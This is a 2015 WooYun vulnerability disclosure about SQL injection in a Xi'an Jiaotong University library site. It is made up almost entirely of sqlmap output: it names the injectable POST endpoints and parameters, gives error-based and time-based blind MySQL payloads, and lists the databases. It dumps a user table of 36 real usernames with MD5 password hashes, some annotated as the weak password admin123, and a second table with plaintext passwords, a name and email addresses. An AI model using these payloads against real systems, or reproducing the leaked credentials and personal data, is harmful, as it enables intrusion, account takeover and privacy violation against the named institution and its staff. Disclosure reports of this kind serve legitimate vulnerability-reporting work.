当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0104128

漏洞标题:西安交通大学某分站POST sql注入

相关厂商:西安交通大学

漏洞作者: 路人甲

提交时间:2015-03-30 10:33

修复时间:2015-05-14 10:48

公开时间:2015-05-14 10:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-30: 细节已通知厂商并且等待厂商处理中
2015-03-30: 厂商已经确认,细节仅向厂商公开
2015-04-09: 细节向核心白帽子及相关领域专家公开
2015-04-19: 细节向普通白帽子公开
2015-04-29: 细节向实习白帽子公开
2015-05-14: 细节向公众公开

简要描述:

POST sql注入

详细说明:

http://www.lib.xjtu.edu.cn/bookriview.do
post参数
action=page&sortType=*&goal=*&indexPage=1&bookname=*
另一处:
http://www.lib.xjtu.edu.cn/news.do
post参数
action=page&sortType=*&goal=*&indexPage=1&title=*

sqlmap identified the following injection points with a total of 1236 HTTP(s) requests:
---
Parameter: bookname (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: action=page&subject=88952634&goal=88952634&indexPage=1&bookname=88952634' AND (SELECT 6480 FROM(SELECT COUNT(*),CONCAT(0x71626b7a71,(SELECT (CASE WHEN (6480=6480) THEN 1 ELSE 0 END)),0x7171717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hfBm'='hfBm
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: action=page&subject=88952634&goal=88952634&indexPage=1&bookname=88952634' AND 6748=BENCHMARK(5000000,MD5(0x5142424a)) AND 'lsfG'='lsfG
Vector: AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])
---
web application technology: JSP
back-end DBMS: MySQL 5.0
available databases [12]:
[*] arc
[*] information_schema
[*] journal
[*] lib
[*] libcms
[*] mysql
[*] resourceGate
[*] resourceNav
[*] shanxicalis
[*] test
[*] xbnlcms
[*] xnold
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: bookname (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: action=page&subject=88952634&goal=88952634&indexPage=1&bookname=88952634' AND (SELECT 6480 FROM(SELECT COUNT(*),CONCAT(0x71626b7a71,(SELECT (CASE WHEN (6480=6480) THEN 1 ELSE 0 END)),0x7171717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hfBm'='hfBm
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: action=page&subject=88952634&goal=88952634&indexPage=1&bookname=88952634' AND 6748=BENCHMARK(5000000,MD5(0x5142424a)) AND 'lsfG'='lsfG
Vector: AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])
---
web application technology: JSP
back-end DBMS: MySQL 5.0
Database: libcms
Table: user
[7 columns]
+------------+
| Column |
+------------+
| DEPARTMENT |
| EMAIL |
| ID |
| NAME |
| PASSWORD |
| STATUS |
| USERNAME |
+------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: bookname (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: action=page&subject=88952634&goal=88952634&indexPage=1&bookname=88952634' AND (SELECT 6480 FROM(SELECT COUNT(*),CONCAT(0x71626b7a71,(SELECT (CASE WHEN (6480=6480) THEN 1 ELSE 0 END)),0x7171717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hfBm'='hfBm
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: action=page&subject=88952634&goal=88952634&indexPage=1&bookname=88952634' AND 6748=BENCHMARK(5000000,MD5(0x5142424a)) AND 'lsfG'='lsfG
Vector: AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])
---
web application technology: JSP
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: bookname (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: action=page&subject=88952634&goal=88952634&indexPage=1&bookname=88952634' AND (SELECT 6480 FROM(SELECT COUNT(*),CONCAT(0x71626b7a71,(SELECT (CASE WHEN (6480=6480) THEN 1 ELSE 0 END)),0x7171717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hfBm'='hfBm
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: action=page&subject=88952634&goal=88952634&indexPage=1&bookname=88952634' AND 6748=BENCHMARK(5000000,MD5(0x5142424a)) AND 'lsfG'='lsfG
Vector: AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])
---
web application technology: JSP
back-end DBMS: MySQL 5.0
Database: libcms
Table: user
[36 entries]
+--------------+----------------------------------+
| USERNAME | PASSWORD |
+--------------+----------------------------------+
| admin | 0192023a7bbd73250516f069df18b500 | (弱口令密码admin123)
| admin123 | 0192023a7bbd73250516f069df18b500 | (弱口令密码admin123)
| caifang | 0495fa657d3a4a348aad8f2c1bd8e8bc |
| mysk | 05e67caa6913bd3c2b63a2b6ce2a289f |
| chenbin | 18a8474b67bb1f43cb4e41e600294d70 |
| hanmeng | 1a9dd20c01de9e76683aba9ddf23d30b |
| zhanglin | 202cb962ac59075b964b07152d234b70 |
| zhouqi | 21232f297a57a5a743894a0e4a801fc3 |
| gaowenli | 238c26372e700c58d689924060a8d5eb |
| qikan | 30f175e6bff6fced1a99398750260018 |
| zhangzy | 31568e2c93090de9b71bac40f188e983 |
| lijuan | 3341af1b873a60450a0e0388f7621d38 |
| myjxw | 38c3da00544da9f3928208a8e9fca0d7 |
| zhangxm | 45105a5f6b77081b9e40c65b95c42fd6 |
| bianmu | 496cdd655db28ab0ae546071485621c8 |
| liutong | 4a13ce88290625fe7531df5d3bc1ae5b |
| gaojianzhong | 4c077802118f286dc1481e7aa77dc228 |
| zhouqin | 73543541802e25aedd8402f584a5f9a0 |
| zhangjing | 7a53928fa4dd31e82c6ef826f341daec |
| yuanmei | 95a00694c96679ea7481fd361c07cd91 |
| lidan | 9882a23bb4373c6f291200d07c9a6739 |
| lidan | a176d29d37c64d4df44cf5b07330276b |
| weiqingshan | b5659d581bb341db24d1d796e30ab345 |
| zhouq | b5659d581bb341db24d1d796e30ab345 |
| chenn | b63e29d4358ed6018d60cfcd0f99fbc4 |
| chenwei | b63e29d4358ed6018d60cfcd0f99fbc4 |
| qiaoyaming | b63e29d4358ed6018d60cfcd0f99fbc4 |
| yuelan | ba05aa90ea6f23a0729cb5d9aa3a7f65 |
| zixun | bb460906a52ff5d514ac7cbd9e17c982 |
| qiuping | bbb65a57d4a599487fcc558559e6e1ac |
| zhangzhiyan | cd4b097bece019787c3f80060b455d90 |
| luohong | dd9c0929817c5d38a4ff6193a260b34e |
| myxs | ddc692ea9caae72071d6343d2620a222 |
| suwanying | e10adc3949ba59abbe56e057f20f883e |
| tanshuping | e902a36ade483cde97d806974068a10f |
| yejian | f411c16058201360ce74fd1b9dce1370 |

漏洞证明:

web application technology: JSP
back-end DBMS: MySQL 5.0
Database: libcms
Table: user
[36 entries]
+--------------+----------------------------------+
| USERNAME | PASSWORD |
+--------------+----------------------------------+
| admin | 0192023a7bbd73250516f069df18b500 | (弱口令密码admin123)
| admin123 | 0192023a7bbd73250516f069df18b500 | (弱口令密码admin123)
| caifang | 0495fa657d3a4a348aad8f2c1bd8e8bc |
| mysk | 05e67caa6913bd3c2b63a2b6ce2a289f |
| chenbin | 18a8474b67bb1f43cb4e41e600294d70 |
| hanmeng | 1a9dd20c01de9e76683aba9ddf23d30b |
| zhanglin | 202cb962ac59075b964b07152d234b70 |
| zhouqi | 21232f297a57a5a743894a0e4a801fc3 |
| gaowenli | 238c26372e700c58d689924060a8d5eb |
| qikan | 30f175e6bff6fced1a99398750260018 |
| zhangzy | 31568e2c93090de9b71bac40f188e983 |
| lijuan | 3341af1b873a60450a0e0388f7621d38 |
| myjxw | 38c3da00544da9f3928208a8e9fca0d7 |
| zhangxm | 45105a5f6b77081b9e40c65b95c42fd6 |
| bianmu | 496cdd655db28ab0ae546071485621c8 |
| liutong | 4a13ce88290625fe7531df5d3bc1ae5b |
| gaojianzhong | 4c077802118f286dc1481e7aa77dc228 |
| zhouqin | 73543541802e25aedd8402f584a5f9a0 |
| zhangjing | 7a53928fa4dd31e82c6ef826f341daec |
| yuanmei | 95a00694c96679ea7481fd361c07cd91 |
| lidan | 9882a23bb4373c6f291200d07c9a6739 |
| lidan | a176d29d37c64d4df44cf5b07330276b |
| weiqingshan | b5659d581bb341db24d1d796e30ab345 |
| zhouq | b5659d581bb341db24d1d796e30ab345 |
| chenn | b63e29d4358ed6018d60cfcd0f99fbc4 |
| chenwei | b63e29d4358ed6018d60cfcd0f99fbc4 |
| qiaoyaming | b63e29d4358ed6018d60cfcd0f99fbc4 |
| yuelan | ba05aa90ea6f23a0729cb5d9aa3a7f65 |
| zixun | bb460906a52ff5d514ac7cbd9e17c982 |
| qiuping | bbb65a57d4a599487fcc558559e6e1ac |
| zhangzhiyan | cd4b097bece019787c3f80060b455d90 |
| luohong | dd9c0929817c5d38a4ff6193a260b34e |
| myxs | ddc692ea9caae72071d6343d2620a222 |
| suwanying | e10adc3949ba59abbe56e057f20f883e |
| tanshuping | e902a36ade483cde97d806974068a10f |
| yejian | f411c16058201360ce74fd1b9dce1370 |


以下表的密码明文存储

web application technology: JSP
back-end DBMS: MySQL 5.0
Database: xnold
Table: db_user
[3 entries]
+----+---------------+-------------------+---------+---------+----------+
| id | name | email | account | role_fk | password |
+----+---------------+-------------------+---------+---------+----------+
| 1 | 韩进 | xjtu_java@163.com | admin | 1 | admin |
| 2 | �昊| xjtu_uu@163.com | test3 | 3 | 1 |
| 6 | 2 | 2 | test2 | 2 | 2 |
+----+---------------+-------------------+---------+---------+----------+

修复方案:

注意参数过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-03-30 10:46

厂商回复:

通知用户处理中

最新状态:

暂无


漏洞评价:

评论